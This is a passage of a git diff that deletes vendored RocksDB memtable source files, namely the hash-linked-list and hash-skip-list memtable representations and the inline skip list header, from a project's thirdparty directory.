-  // Counting header
-  BucketHeader* header = reinterpret_cast<BucketHeader*>(first_next_pointer);
-  if (header->IsSkipListBucket()) {
-    assert(header->GetNumEntries() > threshold_use_skiplist_);
-    auto* skip_list_bucket_header =
-        reinterpret_cast<SkipListBucketHeader*>(header);
-    assert(skip_list_bucket_header->Counting_header.next.load(
-               std::memory_order_relaxed) == header);
-    return skip_list_bucket_header;
-  }
-  assert(header->GetNumEntries() <= threshold_use_skiplist_);
-  return nullptr;
-}
-
-Node* HashLinkListRep::GetLinkListFirstNode(Pointer* first_next_pointer) const {
-  if (first_next_pointer == nullptr) {
-    return nullptr;
-  }
-  if (first_next_pointer->load(std::memory_order_relaxed) == nullptr) {
-    // Single entry bucket
-    return reinterpret_cast<Node*>(first_next_pointer);
-  }
-  // Counting header
-  BucketHeader* header = reinterpret_cast<BucketHeader*>(first_next_pointer);
-  if (!header->IsSkipListBucket()) {
-    assert(header->GetNumEntries() <= threshold_use_skiplist_);
-    return reinterpret_cast<Node*>(
-        header->next.load(std::memory_order_acquire));
-  }
-  assert(header->GetNumEntries() > threshold_use_skiplist_);
-  return nullptr;
-}
-
-void HashLinkListRep::Insert(KeyHandle handle) {
-  Node* x = static_cast<Node*>(handle);
-  assert(!Contains(x->key));
-  Slice internal_key = GetLengthPrefixedSlice(x->key);
-  auto transformed = GetPrefix(internal_key);
-  auto& bucket = buckets_[GetHash(transformed)];
-  Pointer* first_next_pointer =
-      static_cast<Pointer*>(bucket.load(std::memory_order_relaxed));
-
-  if (first_next_pointer == nullptr) {
-    // Case 1. empty bucket
-    // NoBarrier_SetNext() suffices since we will add a barrier when
-    // we publish a pointer to "x" in prev[i].
-    x->NoBarrier_SetNext(nullptr);
-    bucket.store(x, std::memory_order_release);
-    return;
-  }
-
-  BucketHeader* header = nullptr;
-  if (first_next_pointer->load(std::memory_order_relaxed) == nullptr) {
-    // Case 2. only one entry in the bucket
-    // Need to convert to a Counting bucket and turn to case 4.
-    Node* first = reinterpret_cast<Node*>(first_next_pointer);
-    // Need to add a bucket header.
-    // We have to first convert it to a bucket with header before inserting
-    // the new node. Otherwise, we might need to change next pointer of first.
-    // In that case, a reader might sees the next pointer is NULL and wrongly
-    // think the node is a bucket header.
-    auto* mem = allocator_->AllocateAligned(sizeof(BucketHeader));
-    header = new (mem) BucketHeader(first, 1);
-    bucket.store(header, std::memory_order_release);
-  } else {
-    header = reinterpret_cast<BucketHeader*>(first_next_pointer);
-    if (header->IsSkipListBucket()) {
-      // Case 4. Bucket is already a skip list
-      assert(header->GetNumEntries() > threshold_use_skiplist_);
-      auto* skip_list_bucket_header =
-          reinterpret_cast<SkipListBucketHeader*>(header);
-      // Only one thread can execute Insert() at one time. No need to do atomic
-      // incremental.
-      skip_list_bucket_header->Counting_header.IncNumEntries();
-      skip_list_bucket_header->skip_list.Insert(x->key);
-      return;
-    }
-  }
-
-  if (bucket_entries_logging_threshold_ > 0 &&
-      header->GetNumEntries() ==
-          static_cast<uint32_t>(bucket_entries_logging_threshold_)) {
-    Info(logger_, "HashLinkedList bucket %" ROCKSDB_PRIszt
-                  " has more than %d "
-                  "entries. Key to insert: %s",
-         GetHash(transformed), header->GetNumEntries(),
-         GetLengthPrefixedSlice(x->key).ToString(true).c_str());
-  }
-
-  if (header->GetNumEntries() == threshold_use_skiplist_) {
-    // Case 3. number of entries reaches the threshold so need to convert to
-    // skip list.
-    LinkListIterator bucket_iter(
-        this, reinterpret_cast<Node*>(
-                  first_next_pointer->load(std::memory_order_relaxed)));
-    auto mem = allocator_->AllocateAligned(sizeof(SkipListBucketHeader));
-    SkipListBucketHeader* new_skip_list_header = new (mem)
-        SkipListBucketHeader(compare_, allocator_, header->GetNumEntries() + 1);
-    auto& skip_list = new_skip_list_header->skip_list;
-
-    // Add all current entries to the skip list
-    for (bucket_iter.SeekToHead(); bucket_iter.Valid(); bucket_iter.Next()) {
-      skip_list.Insert(bucket_iter.key());
-    }
-
-    // insert the new entry
-    skip_list.Insert(x->key);
-    // Set the bucket
-    bucket.store(new_skip_list_header, std::memory_order_release);
-  } else {
-    // Case 5. Need to insert to the sorted linked list without changing the
-    // header.
-    Node* first =
-        reinterpret_cast<Node*>(header->next.load(std::memory_order_relaxed));
-    assert(first != nullptr);
-    // Advance counter unless the bucket needs to be advanced to skip list.
-    // In that case, we need to make sure the previous count never exceeds
-    // threshold_use_skiplist_ to avoid readers to cast to wrong format.
-    header->IncNumEntries();
-
-    Node* cur = first;
-    Node* prev = nullptr;
-    while (true) {
-      if (cur == nullptr) {
-        break;
-      }
-      Node* next = cur->Next();
-      // Make sure the lists are sorted.
-      // If x points to head_ or next points nullptr, it is trivially satisfied.
-      assert((cur == first) || (next == nullptr) ||
-             KeyIsAfterNode(next->key, cur));
-      if (KeyIsAfterNode(internal_key, cur)) {
-        // Keep searching in this list
-        prev = cur;
-        cur = next;
-      } else {
-        break;
-      }
-    }
-
-    // Our data structure does not allow duplicate insertion
-    assert(cur == nullptr || !Equal(x->key, cur->key));
-
-    // NoBarrier_SetNext() suffices since we will add a barrier when
-    // we publish a pointer to "x" in prev[i].
-    x->NoBarrier_SetNext(cur);
-
-    if (prev) {
-      prev->SetNext(x);
-    } else {
-      header->next.store(static_cast<void*>(x), std::memory_order_release);
-    }
-  }
-}
-
-bool HashLinkListRep::Contains(const char* key) const {
-  Slice internal_key = GetLengthPrefixedSlice(key);
-
-  auto transformed = GetPrefix(internal_key);
-  auto bucket = GetBucket(transformed);
-  if (bucket == nullptr) {
-    return false;
-  }
-
-  SkipListBucketHeader* skip_list_header = GetSkipListBucketHeader(bucket);
-  if (skip_list_header != nullptr) {
-    return skip_list_header->skip_list.Contains(key);
-  } else {
-    return LinkListContains(GetLinkListFirstNode(bucket), internal_key);
-  }
-}
-
-size_t HashLinkListRep::ApproximateMemoryUsage() {
-  // Memory is always allocated from the allocator.
-  return 0;
-}
-
-void HashLinkListRep::Get(const LookupKey& k, void* callback_args,
-                          bool (*callback_func)(void* arg, const char* entry)) {
-  auto transformed = transform_->Transform(k.user_key());
-  auto bucket = GetBucket(transformed);
-
-  auto* skip_list_header = GetSkipListBucketHeader(bucket);
-  if (skip_list_header != nullptr) {
-    // Is a skip list
-    MemtableSkipList::Iterator iter(&skip_list_header->skip_list);
-    for (iter.Seek(k.memtable_key().data());
-         iter.Valid() && callback_func(callback_args, iter.key());
-         iter.Next()) {
-    }
-  } else {
-    auto* link_list_head = GetLinkListFirstNode(bucket);
-    if (link_list_head != nullptr) {
-      LinkListIterator iter(this, link_list_head);
-      for (iter.Seek(k.internal_key(), nullptr);
-           iter.Valid() && callback_func(callback_args, iter.key());
-           iter.Next()) {
-      }
-    }
-  }
-}
-
-MemTableRep::Iterator* HashLinkListRep::GetIterator(Arena* alloc_arena) {
-  // allocate a new arena of similar size to the one currently in use
-  Arena* new_arena = new Arena(allocator_->BlockSize());
-  auto list = new MemtableSkipList(compare_, new_arena);
-  HistogramImpl keys_per_bucket_hist;
-
-  for (size_t i = 0; i < bucket_size_; ++i) {
-    int count = 0;
-    auto* bucket = GetBucket(i);
-    if (bucket != nullptr) {
-      auto* skip_list_header = GetSkipListBucketHeader(bucket);
-      if (skip_list_header != nullptr) {
-        // Is a skip list
-        MemtableSkipList::Iterator itr(&skip_list_header->skip_list);
-        for (itr.SeekToFirst(); itr.Valid(); itr.Next()) {
-          list->Insert(itr.key());
-          count++;
-        }
-      } else {
-        auto* link_list_head = GetLinkListFirstNode(bucket);
-        if (link_list_head != nullptr) {
-          LinkListIterator itr(this, link_list_head);
-          for (itr.SeekToHead(); itr.Valid(); itr.Next()) {
-            list->Insert(itr.key());
-            count++;
-          }
-        }
-      }
-    }
-    if (if_log_bucket_dist_when_flash_) {
-      keys_per_bucket_hist.Add(count);
-    }
-  }
-  if (if_log_bucket_dist_when_flash_ && logger_ != nullptr) {
-    Info(logger_, "hashLinkedList Entry distribution among buckets: %s",
-         keys_per_bucket_hist.ToString().c_str());
-  }
-
-  if (alloc_arena == nullptr) {
-    return new FullListIterator(list, new_arena);
-  } else {
-    auto mem = alloc_arena->AllocateAligned(sizeof(FullListIterator));
-    return new (mem) FullListIterator(list, new_arena);
-  }
-}
-
-MemTableRep::Iterator* HashLinkListRep::GetDynamicPrefixIterator(
-    Arena* alloc_arena) {
-  if (alloc_arena == nullptr) {
-    return new DynamicIterator(*this);
-  } else {
-    auto mem = alloc_arena->AllocateAligned(sizeof(DynamicIterator));
-    return new (mem) DynamicIterator(*this);
-  }
-}
-
-bool HashLinkListRep::LinkListContains(Node* head,
-                                       const Slice& user_key) const {
-  Node* x = FindGreaterOrEqualInBucket(head, user_key);
-  return (x != nullptr && Equal(user_key, x->key));
-}
-
-Node* HashLinkListRep::FindGreaterOrEqualInBucket(Node* head,
-                                                  const Slice& key) const {
-  Node* x = head;
-  while (true) {
-    if (x == nullptr) {
-      return x;
-    }
-    Node* next = x->Next();
-    // Make sure the lists are sorted.
-    // If x points to head_ or next points nullptr, it is trivially satisfied.
-    assert((x == head) || (next == nullptr) || KeyIsAfterNode(next->key, x));
-    if (KeyIsAfterNode(key, x)) {
-      // Keep searching in this list
-      x = next;
-    } else {
-      break;
-    }
-  }
-  return x;
-}
-
-} // anon namespace
-
-MemTableRep* HashLinkListRepFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, Logger* logger) {
-  return new HashLinkListRep(compare, allocator, transform, bucket_count_,
-                             threshold_use_skiplist_, huge_page_tlb_size_,
-                             logger, bucket_entries_logging_threshold_,
-                             if_log_bucket_dist_when_flash_);
-}
-
-MemTableRepFactory* NewHashLinkListRepFactory(
-    size_t bucket_count, size_t huge_page_tlb_size,
-    int bucket_entries_logging_threshold, bool if_log_bucket_dist_when_flash,
-    uint32_t threshold_use_skiplist) {
-  return new HashLinkListRepFactory(
-      bucket_count, threshold_use_skiplist, huge_page_tlb_size,
-      bucket_entries_logging_threshold, if_log_bucket_dist_when_flash);
-}
-
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_linklist_rep.h b/thirdparty/rocksdb/memtable/hash_linklist_rep.h
deleted file mode 100644
index a6da3ee..0000000
--- a/thirdparty/rocksdb/memtable/hash_linklist_rep.h
+++ /dev/null
@@ -1,49 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/memtablerep.h"
-
-namespace rocksdb {
-
-class HashLinkListRepFactory : public MemTableRepFactory {
- public:
-  explicit HashLinkListRepFactory(size_t bucket_count,
-                                  uint32_t threshold_use_skiplist,
-                                  size_t huge_page_tlb_size,
-                                  int bucket_entries_logging_threshold,
-                                  bool if_log_bucket_dist_when_flash)
-      : bucket_count_(bucket_count),
-        threshold_use_skiplist_(threshold_use_skiplist),
-        huge_page_tlb_size_(huge_page_tlb_size),
-        bucket_entries_logging_threshold_(bucket_entries_logging_threshold),
-        if_log_bucket_dist_when_flash_(if_log_bucket_dist_when_flash) {}
-
-  virtual ~HashLinkListRepFactory() {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& compare, Allocator* allocator,
-      const SliceTransform* transform, Logger* logger) override;
-
-  virtual const char* Name() const override {
-    return "HashLinkListRepFactory";
-  }
-
- private:
-  const size_t bucket_count_;
-  const uint32_t threshold_use_skiplist_;
-  const size_t huge_page_tlb_size_;
-  int bucket_entries_logging_threshold_;
-  bool if_log_bucket_dist_when_flash_;
-};
-
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_skiplist_rep.cc b/thirdparty/rocksdb/memtable/hash_skiplist_rep.cc
deleted file mode 100644
index e34743e..0000000
--- a/thirdparty/rocksdb/memtable/hash_skiplist_rep.cc
+++ /dev/null
@@ -1,351 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-
-#ifndef ROCKSDB_LITE
-#include "memtable/hash_skiplist_rep.h"
-
-#include <atomic>
-
-#include "rocksdb/memtablerep.h"
-#include "util/arena.h"
-#include "rocksdb/slice.h"
-#include "rocksdb/slice_transform.h"
-#include "port/port.h"
-#include "util/murmurhash.h"
-#include "db/memtable.h"
-#include "memtable/skiplist.h"
-
-namespace rocksdb {
-namespace {
-
-class HashSkipListRep : public MemTableRep {
- public:
-  HashSkipListRep(const MemTableRep::KeyComparator& compare,
-                  Allocator* allocator, const SliceTransform* transform,
-                  size_t bucket_size, int32_t skiplist_height,
-                  int32_t skiplist_branching_factor);
-
-  virtual void Insert(KeyHandle handle) override;
-
-  virtual bool Contains(const char* key) const override;
-
-  virtual size_t ApproximateMemoryUsage() override;
-
-  virtual void Get(const LookupKey& k, void* callback_args,
-                   bool (*callback_func)(void* arg,
-                                         const char* entry)) override;
-
-  virtual ~HashSkipListRep();
-
-  virtual MemTableRep::Iterator* GetIterator(Arena* arena = nullptr) override;
-
-  virtual MemTableRep::Iterator* GetDynamicPrefixIterator(
-      Arena* arena = nullptr) override;
-
- private:
-  friend class DynamicIterator;
-  typedef SkipList<const char*, const MemTableRep::KeyComparator&> Bucket;
-
-  size_t bucket_size_;
-
-  const int32_t skiplist_height_;
-  const int32_t skiplist_branching_factor_;
-
-  // Maps slices (which are transformed user keys) to buckets of keys sharing
-  // the same transform.
-  std::atomic<Bucket*>* buckets_;
-
-  // The user-supplied transform whose domain is the user keys.
-  const SliceTransform* transform_;
-
-  const MemTableRep::KeyComparator& compare_;
-  // immutable after construction
-  Allocator* const allocator_;
-
-  inline size_t GetHash(const Slice& slice) const {
-    return MurmurHash(slice.data(), static_cast<int>(slice.size()), 0) %
-           bucket_size_;
-  }
-  inline Bucket* GetBucket(size_t i) const {
-    return buckets_[i].load(std::memory_order_acquire);
-  }
-  inline Bucket* GetBucket(const Slice& slice) const {
-    return GetBucket(GetHash(slice));
-  }
-  // Get a bucket from buckets_. If the bucket hasn't been initialized yet,
-  // initialize it before returning.
-  Bucket* GetInitializedBucket(const Slice& transformed);
-
-  class Iterator : public MemTableRep::Iterator {
-   public:
-    explicit Iterator(Bucket* list, bool own_list = true,
-                      Arena* arena = nullptr)
-        : list_(list), iter_(list), own_list_(own_list), arena_(arena) {}
-
-    virtual ~Iterator() {
-      // if we own the list, we should also delete it
-      if (own_list_) {
-        assert(list_ != nullptr);
-        delete list_;
-      }
-    }
-
-    // Returns true iff the iterator is positioned at a valid node.
-    virtual bool Valid() const override {
-      return list_ != nullptr && iter_.Valid();
-    }
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    virtual const char* key() const override {
-      assert(Valid());
-      return iter_.key();
-    }
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    virtual void Next() override {
-      assert(Valid());
-      iter_.Next();
-    }
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    virtual void Prev() override {
-      assert(Valid());
-      iter_.Prev();
-    }
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& internal_key,
-                      const char* memtable_key) override {
-      if (list_ != nullptr) {
-        const char* encoded_key =
-            (memtable_key != nullptr) ?
-                memtable_key : EncodeKey(&tmp_, internal_key);
-        iter_.Seek(encoded_key);
-      }
-    }
-
-    // Retreat to the last entry with a key <= target
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {
-      // not supported
-      assert(false);
-    }
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override {
-      if (list_ != nullptr) {
-        iter_.SeekToFirst();
-      }
-    }
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override {
-      if (list_ != nullptr) {
-        iter_.SeekToLast();
-      }
-    }
-   protected:
-    void Reset(Bucket* list) {
-      if (own_list_) {
-        assert(list_ != nullptr);
-        delete list_;
-      }
-      list_ = list;
-      iter_.SetList(list);
-      own_list_ = false;
-    }
-   private:
-    // if list_ is nullptr, we should NEVER call any methods on iter_
-    // if list_ is nullptr, this Iterator is not Valid()
-    Bucket* list_;
-    Bucket::Iterator iter_;
-    // here we track if we own list_. If we own it, we are also
-    // responsible for it's cleaning. This is a poor man's shared_ptr
-    bool own_list_;
-    std::unique_ptr<Arena> arena_;
-    std::string tmp_;       // For passing to EncodeKey
-  };
-
-  class DynamicIterator : public HashSkipListRep::Iterator {
-   public:
-    explicit DynamicIterator(const HashSkipListRep& memtable_rep)
-      : HashSkipListRep::Iterator(nullptr, false),
-        memtable_rep_(memtable_rep) {}
-
-    // Advance to the first entry with a key >= target
-    virtual void Seek(const Slice& k, const char* memtable_key) override {
-      auto transformed = memtable_rep_.transform_->Transform(ExtractUserKey(k));
-      Reset(memtable_rep_.GetBucket(transformed));
-      HashSkipListRep::Iterator::Seek(k, memtable_key);
-    }
-
-    // Position at the first entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToFirst() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-
-    // Position at the last entry in collection.
-    // Final state of iterator is Valid() iff collection is not empty.
-    virtual void SeekToLast() override {
-      // Prefix iterator does not support total order.
-      // We simply set the iterator to invalid state
-      Reset(nullptr);
-    }
-   private:
-    // the underlying memtable
-    const HashSkipListRep& memtable_rep_;
-  };
-
-  class EmptyIterator : public MemTableRep::Iterator {
-    // This is used when there wasn't a bucket. It is cheaper than
-    // instantiating an empty bucket over which to iterate.
-   public:
-    EmptyIterator() { }
-    virtual bool Valid() const override { return false; }
-    virtual const char* key() const override {
-      assert(false);
-      return nullptr;
-    }
-    virtual void Next() override {}
-    virtual void Prev() override {}
-    virtual void Seek(const Slice& internal_key,
-                      const char* memtable_key) override {}
-    virtual void SeekForPrev(const Slice& internal_key,
-                             const char* memtable_key) override {}
-    virtual void SeekToFirst() override {}
-    virtual void SeekToLast() override {}
-
-   private:
-  };
-};
-
-HashSkipListRep::HashSkipListRep(const MemTableRep::KeyComparator& compare,
-                                 Allocator* allocator,
-                                 const SliceTransform* transform,
-                                 size_t bucket_size, int32_t skiplist_height,
-                                 int32_t skiplist_branching_factor)
-    : MemTableRep(allocator),
-      bucket_size_(bucket_size),
-      skiplist_height_(skiplist_height),
-      skiplist_branching_factor_(skiplist_branching_factor),
-      transform_(transform),
-      compare_(compare),
-      allocator_(allocator) {
-  auto mem = allocator->AllocateAligned(
-               sizeof(std::atomic<void*>) * bucket_size);
-  buckets_ = new (mem) std::atomic<Bucket*>[bucket_size];
-
-  for (size_t i = 0; i < bucket_size_; ++i) {
-    buckets_[i].store(nullptr, std::memory_order_relaxed);
-  }
-}
-
-HashSkipListRep::~HashSkipListRep() {
-}
-
-HashSkipListRep::Bucket* HashSkipListRep::GetInitializedBucket(
-    const Slice& transformed) {
-  size_t hash = GetHash(transformed);
-  auto bucket = GetBucket(hash);
-  if (bucket == nullptr) {
-    auto addr = allocator_->AllocateAligned(sizeof(Bucket));
-    bucket = new (addr) Bucket(compare_, allocator_, skiplist_height_,
-                               skiplist_branching_factor_);
-    buckets_[hash].store(bucket, std::memory_order_release);
-  }
-  return bucket;
-}
-
-void HashSkipListRep::Insert(KeyHandle handle) {
-  auto* key = static_cast<char*>(handle);
-  assert(!Contains(key));
-  auto transformed = transform_->Transform(UserKey(key));
-  auto bucket = GetInitializedBucket(transformed);
-  bucket->Insert(key);
-}
-
-bool HashSkipListRep::Contains(const char* key) const {
-  auto transformed = transform_->Transform(UserKey(key));
-  auto bucket = GetBucket(transformed);
-  if (bucket == nullptr) {
-    return false;
-  }
-  return bucket->Contains(key);
-}
-
-size_t HashSkipListRep::ApproximateMemoryUsage() {
-  return 0;
-}
-
-void HashSkipListRep::Get(const LookupKey& k, void* callback_args,
-                          bool (*callback_func)(void* arg, const char* entry)) {
-  auto transformed = transform_->Transform(k.user_key());
-  auto bucket = GetBucket(transformed);
-  if (bucket != nullptr) {
-    Bucket::Iterator iter(bucket);
-    for (iter.Seek(k.memtable_key().data());
-         iter.Valid() && callback_func(callback_args, iter.key());
-         iter.Next()) {
-    }
-  }
-}
-
-MemTableRep::Iterator* HashSkipListRep::GetIterator(Arena* arena) {
-  // allocate a new arena of similar size to the one currently in use
-  Arena* new_arena = new Arena(allocator_->BlockSize());
-  auto list = new Bucket(compare_, new_arena);
-  for (size_t i = 0; i < bucket_size_; ++i) {
-    auto bucket = GetBucket(i);
-    if (bucket != nullptr) {
-      Bucket::Iterator itr(bucket);
-      for (itr.SeekToFirst(); itr.Valid(); itr.Next()) {
-        list->Insert(itr.key());
-      }
-    }
-  }
-  if (arena == nullptr) {
-    return new Iterator(list, true, new_arena);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(Iterator));
-    return new (mem) Iterator(list, true, new_arena);
-  }
-}
-
-MemTableRep::Iterator* HashSkipListRep::GetDynamicPrefixIterator(Arena* arena) {
-  if (arena == nullptr) {
-    return new DynamicIterator(*this);
-  } else {
-    auto mem = arena->AllocateAligned(sizeof(DynamicIterator));
-    return new (mem) DynamicIterator(*this);
-  }
-}
-
-} // anon namespace
-
-MemTableRep* HashSkipListRepFactory::CreateMemTableRep(
-    const MemTableRep::KeyComparator& compare, Allocator* allocator,
-    const SliceTransform* transform, Logger* logger) {
-  return new HashSkipListRep(compare, allocator, transform, bucket_count_,
-                             skiplist_height_, skiplist_branching_factor_);
-}
-
-MemTableRepFactory* NewHashSkipListRepFactory(
-    size_t bucket_count, int32_t skiplist_height,
-    int32_t skiplist_branching_factor) {
-  return new HashSkipListRepFactory(bucket_count, skiplist_height,
-      skiplist_branching_factor);
-}
-
-} // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/hash_skiplist_rep.h b/thirdparty/rocksdb/memtable/hash_skiplist_rep.h
deleted file mode 100644
index 5d1e04f..0000000
--- a/thirdparty/rocksdb/memtable/hash_skiplist_rep.h
+++ /dev/null
@@ -1,44 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.
-// Use of this source code is governed by a BSD-style license that can be
-// found in the LICENSE file. See the AUTHORS file for names of contributors.
-
-#pragma once
-#ifndef ROCKSDB_LITE
-#include "rocksdb/slice_transform.h"
-#include "rocksdb/memtablerep.h"
-
-namespace rocksdb {
-
-class HashSkipListRepFactory : public MemTableRepFactory {
- public:
-  explicit HashSkipListRepFactory(
-    size_t bucket_count,
-    int32_t skiplist_height,
-    int32_t skiplist_branching_factor)
-      : bucket_count_(bucket_count),
-        skiplist_height_(skiplist_height),
-        skiplist_branching_factor_(skiplist_branching_factor) { }
-
-  virtual ~HashSkipListRepFactory() {}
-
-  using MemTableRepFactory::CreateMemTableRep;
-  virtual MemTableRep* CreateMemTableRep(
-      const MemTableRep::KeyComparator& compare, Allocator* allocator,
-      const SliceTransform* transform, Logger* logger) override;
-
-  virtual const char* Name() const override {
-    return "HashSkipListRepFactory";
-  }
-
- private:
-  const size_t bucket_count_;
-  const int32_t skiplist_height_;
-  const int32_t skiplist_branching_factor_;
-};
-
-}
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/memtable/inlineskiplist.h b/thirdparty/rocksdb/memtable/inlineskiplist.h
deleted file mode 100644
index 5cf6c57..0000000
--- a/thirdparty/rocksdb/memtable/inlineskiplist.h
+++ /dev/null
@@ -1,899 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-// Copyright (c) 2011 The LevelDB Authors. All rights reserved.  Use of
-// this source code is governed by a BSD-style license that can be found
-// in the LICENSE file. See the AUTHORS file for names of contributors.
-//
-// InlineSkipList is derived from SkipList (skiplist.h), but it optimizes
-// the memory layout by requiring that the key storage be allocated through
-// the skip list instance.  For the common case of SkipList<const char*,
-// Cmp> this saves 1 pointer per skip list node and gives better cache
-// locality, at the expense of wasted padding from using AllocateAligned
-// instead of Allocate for the keys.  The unused padding will be from
-// 0 to sizeof(void*)-1 bytes, and the space savings are sizeof(void*)
-// bytes, so despite the padding the space used is always less than
-// SkipList<const char*, ..>.
-//
-// Thread safety -------------
-//
-// Writes via Insert require external synchronization, most likely a mutex.
-// InsertConcurrently can be safely called concurrently with reads and
-// with other concurrent inserts.  Reads require a guarantee that the
-// InlineSkipList will not be destroyed while the read is in progress.
-// Apart from that, reads progress without any internal locking or
-// synchronization.
-//
-// Invariants:
-//
-// (1) Allocated nodes are never deleted until the InlineSkipList is
-// destroyed.  This is trivially guaranteed by the code since we never
-// delete any skip list nodes.
-//
-// (2) The contents of a Node except for the next/prev pointers are
-// immutable after the Node has been linked into the InlineSkipList.
-// Only Insert() modifies the list, and it is careful to initialize a
-// node and use release-stores to publish the nodes in one or more lists.
-//
-// ... prev vs. next pointer ordering ...
-//
-
-#pragma once
-#include <assert.h>
-#include <stdlib.h>
-#include <algorithm>
-#include <atomic>
-#include "port/port.h"
-#include "util/allocator.h"
-#include "util/random.h"
-
-namespace rocksdb {
-
-template <class Comparator>
-class InlineSkipList {
- private:
-  struct Node;
-  struct Splice;
-
- public:
-  static const uint16_t kMaxPossibleHeight = 32;
-
-  // Create a new InlineSkipList object that will use "cmp" for comparing
-  // keys, and will allocate memory using "*allocator".  Objects allocated
-  // in the allocator must remain allocated for the lifetime of the
-  // skiplist object.
-  explicit InlineSkipList(Comparator cmp, Allocator* allocator,
-                          int32_t max_height = 12,
-                          int32_t branching_factor = 4);
-
-  // Allocates a key and a skip-list node, returning a pointer to the key
-  // portion of the node.  This method is thread-safe if the allocator
-  // is thread-safe.
-  char* AllocateKey(size_t key_size);
-
-  // Allocate a splice using allocator.
-  Splice* AllocateSplice();
-
-  // Inserts a key allocated by AllocateKey, after the actual key value
-  // has been filled in.
-  //
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  // REQUIRES: no concurrent calls to any of inserts.
-  void Insert(const char* key);
-
-  // Inserts a key allocated by AllocateKey with a hint of last insert
-  // position in the skip-list. If hint points to nullptr, a new hint will be
-  // populated, which can be used in subsequent calls.
-  //
-  // It can be used to optimize the workload where there are multiple groups
-  // of keys, and each key is likely to insert to a location close to the last
-  // inserted key in the same group. One example is sequential inserts.
-  //
-  // REQUIRES: nothing that compares equal to key is currently in the list.
-  // REQUIRES: no concurrent calls to any of inserts.
-  void InsertWithHint(const char* key, void** hint);
-
-  // Like Insert, but external synchronization is not required.
-  void InsertConcurrently(const char* key);
-
-  // Inserts a node into the skip list.  key must have been allocated by
-  // AllocateKey and then filled in by the caller.  If UseCAS is true,
-  // then external synchronization is not required, otherwise this method
-  // may not be called concurrently with any other insertions.
-  //
-  // Regardless of whether UseCAS is true, the splice must be owned
-  // exclusively by the current thread.  If allow_partial_splice_fix is
-  // true, then the cost of insertion is amortized O(log D), where D is
-  // the distance from the splice to the inserted key (measured as the
-  // number of intervening nodes).  Note that this bound is very good for
-  // sequential insertions!  If allow_partial_splice_fix is false then
-  // the existing splice will be ignored unless the current key is being
-  // inserted immediately after the splice.  allow_partial_splice_fix ==
-  // false has worse running time for the non-sequential case O(log N),
-  // but a better constant factor.
-  template <bool UseCAS>
-  void Insert(const char* key, Splice* splice, bool allow_partial_splice_fix);
-
-  // Returns true iff an entry that compares equal to key is in the list.
-  bool Contains(const char* key) const;
-
-  // Return estimated number of entries smaller than `key`.
-  uint64_t EstimateCount(const char* key) const;
-
-  // Validate correctness of the skip-list.
-  void TEST_Validate() const;
-
-  // Iteration over the contents of a skip list
-  class Iterator {
-   public:
-    // Initialize an iterator over the specified list.
-    // The returned iterator is not valid.
-    explicit Iterator(const InlineSkipList* list);
-
-    // Change the underlying skiplist used for this iterator
-    // This enables us not changing the iterator without deallocating
-    // an old one and then allocating a new one
-    void SetList(const InlineSkipList* list);
-
-    // Returns true iff the iterator is positioned at a valid node.
-    bool Valid() const;
-
-    // Returns the key at the current position.
-    // REQUIRES: Valid()
-    const char* key() const;
-
-    // Advances to the next position.
-    // REQUIRES: Valid()
-    void Next();
-
-    // Advances to the previous position.
-    // REQUIRES: Valid()
-    void Prev();
-
-    // Advance to the first entry with a key >= target
-    void Seek(const char* target);
-
-    // Retreat to the last entry with a key <= target
-    void SeekForPrev(const char* target);
-
-    // Position at the first entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    void SeekToFirst();
-
-    // Position at the last entry in list.
-    // Final state of iterator is Valid() iff list is not empty.
-    void SeekToLast();
-
-   private:
-    const InlineSkipList* list_;
-    Node* node_;
-    // Intentionally copyable
-  };
-
- private:
-  const uint16_t kMaxHeight_;
-  const uint16_t kBranching_;
-  const uint32_t kScaledInverseBranching_;
-
-  // Immutable after construction
-  Comparator const compare_;
-  Allocator* const allocator_;  // Allocator used for allocations of nodes
-
-  Node* const head_;
-
-  // Modified only by Insert().  Read racily by readers, but stale
-  // values are ok.
